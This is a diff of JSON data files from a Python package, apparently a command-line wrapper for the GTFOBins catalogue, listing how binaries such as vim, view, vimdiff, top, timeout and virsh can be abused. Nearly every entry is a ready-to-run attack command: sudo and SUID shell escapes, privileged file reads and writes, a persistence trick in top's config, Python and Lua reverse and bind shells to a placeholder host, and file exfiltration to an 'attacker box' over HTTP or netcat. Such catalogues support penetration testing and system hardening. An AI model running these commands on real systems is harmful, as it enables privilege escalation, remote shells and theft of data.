gtfobins-cli 1.0.0__py3-none-any.whl

gtfo/data/tftp.json

@@ -0,0 +1,28 @@
+{
+  "functions": {
+    "file-upload": [
+      {
+        "description": "Send local file to a TFTP server.",
+        "code": "tftp [host]\nput [file]\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Fetch a remote file from a TFTP server.",
+        "code": "tftp [host]\nget [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "description": "Send local file to a TFTP server.",
+        "code": "./tftp [host]\nput [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "Send local file to a TFTP server.",
+        "code": "sudo tftp [host]\nput [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/time.json

@@ -0,0 +1,20 @@
+{
+  "description": "Note that the shell might have its own builtin time implementation, which may behave differently than '/usr/bin/time', hence the absolute path.",
+  "functions": {
+    "shell": [
+      {
+        "code": "/usr/bin/time /bin/sh"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./time /bin/sh -p"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo /usr/bin/time /bin/sh"
+      }
+    ]
+  }
+}

gtfo/data/timeout.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "timeout 7d /bin/sh"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./timeout 7d /bin/sh -p"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo timeout --foreground 7d /bin/sh"
+      }
+    ]
+  }
+}

gtfo/data/tmux.json

@@ -0,0 +1,14 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "tmux"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo tmux"
+      }
+    ]
+  }
+}

gtfo/data/top.json

@@ -0,0 +1,16 @@
+{
+  "description": "This requires that an existing configuration file is present, to create one run 'top' then type 'Wq'. Note down the actual configuration file path and use it in the below examples.",
+  "functions": {
+    "shell": [
+      {
+        "code": "echo -e 'pipe\\tx\\texec /bin/sh 1>&0 2>&0' >>~/.config/procps/toprc\ntop\n# press return twice\nreset\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "This requires that the root configuration file is writable and might be used to persist elevated privileges.",
+        "code": "echo -e 'pipe\\tx\\texec /bin/sh 1>&0 2>&0' >>/root/.config/procps/toprc\nsudo top\n# press return twice\nreset\n"
+      }
+    ]
+  }
+}

gtfo/data/troff.json

@@ -0,0 +1,20 @@
+{
+  "description": "The file is typeset but text is still readable in the output, alternatively the output can be read with 'man -l'.\n",
+  "functions": {
+    "file-read": [
+      {
+        "code": "troff [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./troff [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo troff [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/ul.json

@@ -0,0 +1,20 @@
+{
+  "description": "The read file content is corrupted by replacing occurrences of '$'\\b_'' to terminal sequences and by converting tabs to spaces.",
+  "functions": {
+    "file-read": [
+      {
+        "code": "ul [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./ul [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo ul [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/unexpand.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "code": "unexpand -t99999999 [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./unexpand -t99999999 [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo unexpand -t99999999 [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/uniq.json

@@ -0,0 +1,20 @@
+{
+  "description": "The read file content is corrupted by squashing multiple adjacent lines.",
+  "functions": {
+    "file-read": [
+      {
+        "code": "uniq [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./uniq [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo uniq [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/unshare.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "unshare /bin/sh"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./unshare -r /bin/sh"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo unshare /bin/sh"
+      }
+    ]
+  }
+}

gtfo/data/update-alternatives.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        "description": "Write in [file] a symlink to $TF.",
+        "code": "TF=$(mktemp)\necho DATA >$TF\nsudo update-alternatives --force --install [file] x \"$TF\" 0\n"
+      }
+    ],
+    "suid": [
+      {
+        "description": "Write in [file] a symlink to $TF.",
+        "code": "TF=$(mktemp)\necho DATA >$TF\n./update-alternatives --force --install [file] x \"$TF\" 0\n"
+      }
+    ]
+  }
+}

gtfo/data/uuencode.json

@@ -0,0 +1,19 @@
+{
+	"functions": {
+		"file-read": [
+			{
+				"code": "uuencode \"[file]\" /dev/stdout | uudecode\n"
+			}
+		],
+		"suid": [
+			{
+				"code": "uuencode \"[file]\" /dev/stdout | uudecode\n"
+			}
+		],
+		"sudo": [
+			{
+				"code": "sudo uuencode \"[file]\" /dev/stdout | uudecode\n"
+			}
+		]
+	}
+}

gtfo/data/valgrind.json

@@ -0,0 +1,14 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "valgrind /bin/sh"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo valgrind /bin/sh"
+      }
+    ]
+  }
+}

gtfo/data/vi.json

@@ -0,0 +1,28 @@
+{
+  "description": "Modern Unix systems run 'vim' binary when 'vi' is called.",
+  "functions": {
+    "shell": [
+      {
+        "code": "vi -c ':!/bin/sh' /dev/null"
+      },
+      {
+        "code": "vi\n:set shell=/bin/sh\n:shell\n"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "vi [file]\niDATA\n^[\nw\n"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "vi [file]"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo vi -c ':!/bin/sh' /dev/null"
+      }
+    ]
+  }
+}

gtfo/data/view.json

@@ -0,0 +1,109 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "view -c ':!/bin/sh'"
+      },
+      {
+        "code": "view\n:set shell=/bin/sh\n:shell\n"
+      },
+      {
+        "description": "This requires that 'view' is compiled with Python support. Prepend ':py3' for Python 3.",
+        "code": "view -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'"
+      },
+      {
+        "description": "This requires that 'view' is compiled with Lua support.",
+        "code": "view -c ':lua os.execute(\"reset; exec sh\")'"
+      }
+    ],
+    "reverse-shell": [
+      {
+        "description": "This requires that 'view' is compiled with Python support. Pr[e]pend ':py3' for Python 3. Run 'socat file:`tty`,raw,echo=0 tcp-listen:[port]' on the attacker box to receive the shell.",
+        "code": "view -c ':py import vim,sys,socket,os,pty;s=socket.socket()\ns.connect((\"[host]\",[port]))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")\nvim.command(\":q!\")'\n"
+      }
+    ],
+    "non-interactive-reverse-shell": [
+      {
+        "description": "Run 'nc [host] [port]' on the attacker box to receive the shell. This requires that 'view' is compiled with Lua support and that 'lua-socket' is installed.",
+        "code": "view -c ':lua local s=require(\"socket\"); local t=assert(s.tcp());\nt:connect(\"[host]\", [port]);\nwhile true do\n  local r,x=t:receive();local f=assert(io.popen(r,\"r\"));\n  local b=assert(f:read(\"*a\"));t:send(b);\nend;\nf:close();t:close();'\n"
+      }
+    ],
+    "non-interactive-bind-shell": [
+      {
+        "description": "Run 'nc [host] [port]' on the attacker box to connect to the shell. This requires that 'view' is compiled with Lua support and that 'lua-socket' is installed.",
+        "code": "view -c ':lua local k=require(\"socket\");\nlo[cal s=assert(k.bind(\"*\", [port]));\nlocal c=s:accept();\nwhile true do\n  local r,x=c:receive();local f=assert(io.popen(r,\"r\"));\n  local b=assert(f:read(\"*a\"));c:send(b);\nend;c:close();f:close();'\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "This requires that 'view' is compiled with Python support. Prepend ':py3' for Python 3. Send local file via \"d\" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
+        "code": "view -c ':py import vim,sys;\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"[host]\", bytes(u.urlencode({\"d\":open(\"[file]\").read()}).encode()))\nvim.command(\":q!\")'\n"
+      },
+      {
+        "description": "This requires that 'view' is compiled with Python support. Prepend ':py3' for Python 3. Serve files in the local folder running an HTTP server.",
+        "code": "view -c ':py import vim,sys;\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", [port]), s.SimpleHTTPRequestHandler).serve_forever()\nvim.command(\":q!\")'\n"
+      },
+      {
+        "description": "Send a local file via TCP. Run 'nc -l -p [port] > [file]' on the attacker box to collect the file. This requires that 'view' is compiled with Lua support and that 'lua-socket' is installed.",
+        "code": "view -c ':lua local f=io.open(\"[file]\", \"rb\")\nlocal d=f:read(\"*a\")\nio.close(f);\nlocal s=require(\"socket\");\nlocal t=assert(s.tcp());\nt:connect(\"[host]\", [port]);\nt:send(d);\nt:close();'\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "This requires that 'view' is compiled with Python support. Prepend ':py3' for Python 3. Fetch a remote file via HTTP GET request.",
+        "code": "view -c ':py import vim,sys;\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"[host]\", \"[file]\")\nvim.command(\":q!\")'\n"
+      },
+      {
+        "description": "Fetch a remote file via TCP. Run 'nc [host] [port] < [file]' on the attacker box to send the file. This requires that 'view' is compiled with Lua support and that 'lua-socket' is installed.",
+        "code": "view -c ':lua local k=require(\"socket\");\nlocal s=assert(k.bind(\"*\",\"[port]\"));\nlocal c=s:accept();\nlocal d,x=c:receive(\"*a\");\nc:close();\nlocal f=io.open(\"[file]\", \"wb\");\nf:write(d);\nio.close(f);'\n"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "view [file]\niDATA\n^[\nw!\n"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "view [file]"
+      }
+    ],
+    "library-load": [
+      {
+        "description": "This requires that 'view' is compiled with Python support. Prepend ':py3' for Python 3.",
+        "code": "view -c ':py import vim; from ctypes import cdll; cdll.LoadLibrary(\"lib.so\"); vim.command(\":q!\")'"
+      }
+    ],
+    "suid": [
+      {
+        "description": "This requires that 'view' is compiled with Python support. Prepend ':py3' for Python 3.",
+        "code": "./view -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-pc\", \"reset; exec sh -p\")'"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo view -c ':!/bin/sh'"
+      },
+      {
+        "description": "This requires that 'view' is compiled with Python support. Prepend ':py3' for Python 3.",
+        "code": "sudo view -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'"
+      },
+      {
+        "description": "This requires that 'view' is compiled with Lua support.",
+        "code": "sudo view -c ':lua os.execute(\"reset; exec sh\")'"
+      }
+    ],
+    "capabilities": [
+      {
+        "description": "This requires that 'view' is compiled with Python support. Prepend ':py3' for Python 3.",
+        "code": "./view -c ':py import os; os.setuid(0); os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'"
+      }
+    ],
+    "limited-suid": [
+      {
+        "description": "This requires that 'view' is compiled with Lua support.",
+        "code": "./view -c ':lua os.execute(\"reset; exec sh\")'"
+      }
+    ]
+  }
+}

gtfo/data/vim.json

@@ -0,0 +1,109 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "vim -c ':!/bin/sh'"
+      },
+      {
+        "code": "vim\n:set shell=/bin/sh\n:shell\n"
+      },
+      {
+        "description": "This requires that 'vim' is compiled with Python support. Prepend ':py3' for Python 3.",
+        "code": "vim -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'"
+      },
+      {
+        "description": "This requires that 'vim' is compiled with Lua support.",
+        "code": "vim -c ':lua os.execute(\"reset; exec sh\")'"
+      }
+    ],
+    "reverse-shell": [
+      {
+        "description": "This requires that 'vim' is compiled with Python support. Prepend ':py3' for Python 3. Run 'socat file:`tty`,raw,echo=0 tcp-listen:[port]' on the attacker box to receive the shell.",
+        "code": "vim -c ':py import vim,sys,socket,os,pty;s=socket.socket()\ns.connect((\"[host]\",[port]))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")\nvim.command(\":q!\")'\n"
+      }
+    ],
+    "non-interactive-reverse-shell": [
+      {
+        "description": "Run 'nc -lp [port]' on the attacker box to receive the shell. This requires that 'vim' is compiled with Lua support and that 'lua-socket' is installed.",
+        "code": "vim -c ':lua local s=require(\"socket\"); local t=assert(s.tcp());\n  t:connect(\"[host]\",[port]);\n  while true do\n    local r,x=t:receive();local f=assert(io.popen(r,\"r\"));\n    local b=assert(f:read(\"*a\"));t:send(b);\n  end;\n  f:close();t:close();'\n"
+      }
+    ],
+    "non-interactive-bind-shell": [
+      {
+        "description": "Run 'nc [host] [port]' on the attacker box to connect to the shell. This requires that 'vim' is compiled with Lua support and that 'lua-socket' is installed.",
+        "code": "vim -c ':lua local k=require(\"socket\");\n  local s=assert(k.bind(\"*\",[port]));\n  local c=s:accept();\n  while true do\n    local r,x=c:receive();local f=assert(io.popen(r,\"r\"));\n    local b=assert(f:read(\"*a\"));c:send(b);\n  end;c:close();f:close();'\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "This requires that 'vim' is compiled with Python support. Prepend ':py3' for Python 3. Send local file via 'd' parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
+        "code": "vim -c ':py import vim,sys;\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"[url]\", bytes(u.urlencode({\"d\":open(\"[file]\").read()}).encode()))\nvim.command(\":q!\")'\n"
+      },
+      {
+        "description": "This requires that 'vim' is compiled with Python support. Prepend ':py3' for Python 3. Serve files in the local folder running an HTTP server.",
+        "code": "vim -c ':py import vim,sys;\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", [port]), s.SimpleHTTPRequestHandler).serve_forever()\nvim.command(\":q!\")'\n"
+      },
+      {
+        "description": "Send a local file via TCP. Run 'nc -lp [port] > [file]' on the attacker box to collect the file. This requires that 'vim' is compiled with Lua support and that 'lua-socket' is installed.",
+        "code": "vim -c ':lua local f=io.open(\"[file]\", 'rb')\n  local d=f:read(\"*a\")\n  io.close(f);\n  local s=require(\"socket\");\n  local t=assert(s.tcp());\n  t:connect(\"[host]\",[port]);\n  t:send(d);\n  t:close();'\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "This requires that 'vim' is compiled with Python support. Prepend ':py3' for Python 3. Fetch a remote file via HTTP GET request.",
+        "code": "vim -c ':py import vim,sys;\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"[url]\", \"[file]\")\nvim.command(\":q!\")'\n"
+      },
+      {
+        "description": "Fetch a remote file via TCP. Run 'nc [host] [port] < [file]' on the attacker box to send the file. This requires that 'vim' is compiled with Lua support and that 'lua-socket' is installed.",
+        "code": "vim -c ':lua local k=require(\"socket\");\n  local s=assert(k.bind(\"*\",[port]));\n  local c=s:accept();\n  local d,x=c:receive(\"*a\");\n  c:close();\n  local f=io.open(\"[file]\", \"wb\");\n  f:write(d);\n  io.close(f);'\n"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "vim [file]\niDATA\n^[\nw\n"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "vim [file]"
+      }
+    ],
+    "library-load": [
+      {
+        "description": "This requires that 'vim' is compiled with Python support. Prepend ':py3' for Python 3.",
+        "code": "vim -c ':py import vim; from ctypes import cdll; cdll.LoadLibrary(\"lib.so\"); vim.command(\":q!\")'"
+      }
+    ],
+    "suid": [
+      {
+        "description": "This requires that 'vim' is compiled with Python support. Prepend ':py3' for Python 3.",
+        "code": "./vim -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-pc\", \"reset; exec sh -p\")'"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo vim -c ':!/bin/sh'"
+      },
+      {
+        "description": "This requires that 'vim' is compiled with Python support. Prepend ':py3' for Python 3.",
+        "code": "sudo vim -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'"
+      },
+      {
+        "description": "This requires that 'vim' is compiled with Lua support.",
+        "code": "sudo vim -c ':lua os.execute(\"reset; exec sh\")'"
+      }
+    ],
+    "capabilities": [
+      {
+        "description": "This requires that 'vim' is compiled with Python support. Prepend ':py3' for Python 3.",
+        "code": "./vim -c ':py import os; os.setuid(0); os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'"
+      }
+    ],
+    "limited-suid": [
+      {
+        "description": "This requires that 'vim' is compiled with Lua support.",
+        "code": "./vim -c ':lua os.execute(\"reset; exec sh\")'"
+      }
+    ]
+  }
+}

gtfo/data/vimdiff.json

@@ -0,0 +1,109 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "vimdiff -c ':!/bin/sh'"
+      },
+      {
+        "code": "vimdiff\n:set shell=/bin/sh\n:shell\n"
+      },
+      {
+        "description": "This requires that 'vimdiff' is compiled with Python support. Prepend ':py3' for Python 3.",
+        "code": "vimdiff -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'"
+      },
+      {
+        "description": "This requires that 'vimdiff' is compiled with Lua support.",
+        "code": "vimdiff -c ':lua os.execute(\"reset; exec sh\")'"
+      }
+    ],
+    "reverse-shell": [
+      {
+        "description": "This requires that 'vimdiff' is compiled with Python support. Prepend ':py3' for Python 3. Run 'socat file:`tty`,raw,echo=0 tcp-listen:[port]' on the attacker box to receive the shell.",
+        "code": "vimdiff -c ':py import vim,sys,socket,os,pty;s=socket.socket()\ns.connect((\"[host]\",[port]))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")\nvim.command(\":q!\")'\n"
+      }
+    ],
+    "non-interactive-reverse-shell": [
+      {
+        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell. This requires that 'vimdiff' is compiled with Lua support and that 'lua-socket' is installed.",
+        "code": "vimdiff -c ':lua local s=require(\"socket\"); local t=assert(s.tcp());\n  t:connect(\"[host]\",[port]);\n  while true do\n    local r,x=t:receive();local f=assert(io.popen(r,\"r\"));\n    local b=assert(f:read(\"*a\"));t:send(b);\n  end;\n  f:close();t:close();'\n"
+      }
+    ],
+    "non-interactive-bind-shell": [
+      {
+        "description": "Run 'nc [host] [port]' on the attacker box to connect to the shell. This requires that 'vimdiff' is compiled with Lua support and that 'lua-socket' is installed.",
+        "code": "vimdiff -c ':lua local k=require(\"socket\");\n  local s=assert(k.bind(\"*\",[port]));\n  local c=s:accept();\n  while true do\n    local r,x=c:receive();local f=assert(io.popen(r,\"r\"));\n    local b=assert(f:read(\"*a\"));c:send(b);\n  end;c:close();f:close();'\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "This requires that 'vimdiff' is compiled with Python support. Prepend ':py3' for Python 3. Send local file via 'd' parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
+        "code": "vimdiff -c ':py import vim,sys\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"[host]\", bytes(u.urlencode({\"d\":open(\"[file]\").read()}).encode()))\nvim.command(\":q!\")'\n"
+      },
+      {
+        "description": "This requires that 'vimdiff' is compiled with Python support. Prepend ':py3' for Python 3. Serve files in the local folder running an HTTP server.",
+        "code": "vimdiff -c ':py import vim,sys\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", [port]), s.SimpleHTTPRequestHandler).serve_forever()\nvim.command(\":q!\")'\n"
+      },
+      {
+        "description": "Send a local file via TCP. Run 'nc -l -p [port] > [file]' on the attacker box to collect the file. This requires that 'vimdiff' is compiled with Lua support and that 'lua-socket' is installed.",
+        "code": "vimdiff -c ':lua local f=io.open(\"[file]\", 'rb')\n  local d=f:read(\"*a\")\n  io.close(f);\n  local s=require(\"socket\");\n  local t=assert(s.tcp());\n  t:connect(\"[host]\",[port]);\n  t:send(d);\n  t:close();'\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "This requires that 'vimdiff' is compiled with Python support. Prepend ':py3' for Python 3. Fetch a remote file via HTTP GET request.",
+        "code": "vimdiff -c ':py import vim,sys\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"[host]\", \"[file]\")\nvim.command(\":q!\")'\n"
+      },
+      {
+        "description": "Fetch a remote file via TCP. Run 'nc [host] [port] < [file]' on the attacker box to send the file. This requires that 'vimdiff' is compiled with Lua support and that 'lua-socket' is installed.",
+        "code": "vimdiff -c ':lua local k=require(\"socket\");\n  local s=assert(k.bind(\"*\",[port]));\n  local c=s:accept();\n  local d,x=c:receive(\"*a\");\n  c:close();\n  local f=io.open(\"[file]\", \"wb\");\n  f:write(d);\n  io.close(f);'\n"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "vimdiff [file]\ni[data]\n^[\nw\n"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "vimdiff [file]"
+      }
+    ],
+    "library-load": [
+      {
+        "description": "This requires that 'vimdiff' is compiled with Python support. Prepend ':py3' for Python 3.",
+        "code": "vimdiff -c ':py import vim; from ctypes import cdll; cdll.LoadLibrary(\"lib.so\"); vim.command(\":q!\")'"
+      }
+    ],
+    "suid": [
+      {
+        "description": "This requires that 'vimdiff' is compiled with Python support. Prepend ':py3' for Python 3.",
+        "code": "./vimdiff -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-pc\", \"reset; exec sh -p\")'"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo vimdiff -c ':!/bin/sh'"
+      },
+      {
+        "description": "This requires that 'vimdiff' is compiled with Python support. Prepend ':py3' for Python 3.",
+        "code": "sudo vimdiff -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'"
+      },
+      {
+        "description": "This requires that 'vimdiff' is compiled with Lua support.",
+        "code": "sudo vimdiff -c ':lua os.execute(\"reset; exec sh\")'"
+      }
+    ],
+    "capabilities": [
+      {
+        "description": "This requires that 'vimdiff' is compiled with Python support. Prepend ':py3' for Python 3.",
+        "code": "./vimdiff -c ':py import os; os.setuid(0); os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'"
+      }
+    ],
+    "limited-suid": [
+      {
+        "description": "This requires that 'vimdiff' is compiled with Lua support.",
+        "code": "./vimdiff -c ':lua os.execute(\"reset; exec sh\")'"
+      }
+    ]
+  }
+}

gtfo/data/virsh.json

@@ -0,0 +1,21 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        "code": "TF=$(mktemp)\ncat > $TF << EOF\n<domain type='kvm'>\n  <name>x</name>\n  <os>\n    <type arch='x86_64'>hvm</type>\n  </os>\n  <memory unit='KiB'>1</memory>\n  <devices>\n    <interface type='ethernet'>\n      <script path='[script]'/>\n    </interface>\n  </devices>\n</domain>\nEOF\nsudo virsh -c qemu:///system create $TF\nvirsh -c qemu:///system destroy x\n"
+      }
+    ],
+    "file-write": [
+      {
+        "description": "This requires the user to be in the 'libvirt' group to perform privileged file write. If the target directory doesn't exist, 'pool-create-as' must be run with the '--build' option. The destination file ownership and permissions can be set in the XML.",
+        "code": "echo '[data]' > [data_to_write]\n\nTF=$(mktemp)\ncat > $TF <<EOF\n<volume type='file'>\n  <name>y</name>\n  <key>[dir]/[file]</key>\n  <source>\n  </source>\n  <capacity unit='bytes'>5</capacity>\n  <allocation unit='bytes'>4096</allocation>\n  <physical unit='bytes'>5</physical>\n  <target>\n    <path>[dir]/[file]</path>\n    <format type='raw'/>\n    <permissions>\n      <mode>0600</mode>\n      <owner>0</owner>\n      <group>0</group>\n    </permissions>\n  </target>\n</volume>\nEOF\n\nvirsh -c qemu:///system pool-create-as x dir --target [dir]\nvirsh -c qemu:///system vol-create --pool x --file $TF\nvirsh -c qemu:///system vol-upload --pool x [dir]/[file] [data_to_write]\nvirsh -c qemu:///system pool-destroy x\n"
+      }
+    ],
+    "file-read": [
+      {
+        "description": "This requires the user to be in the 'libvirt' group to perform privileged file read.",
+        "code": "virsh -c qemu:///system pool-create-as x dir --target /root\nvirsh -c qemu:///system vol-download --pool x [file] [file_to_save]\nvirsh -c qemu:///system pool-destroy x\n"
+      }
+    ]
+  }
+}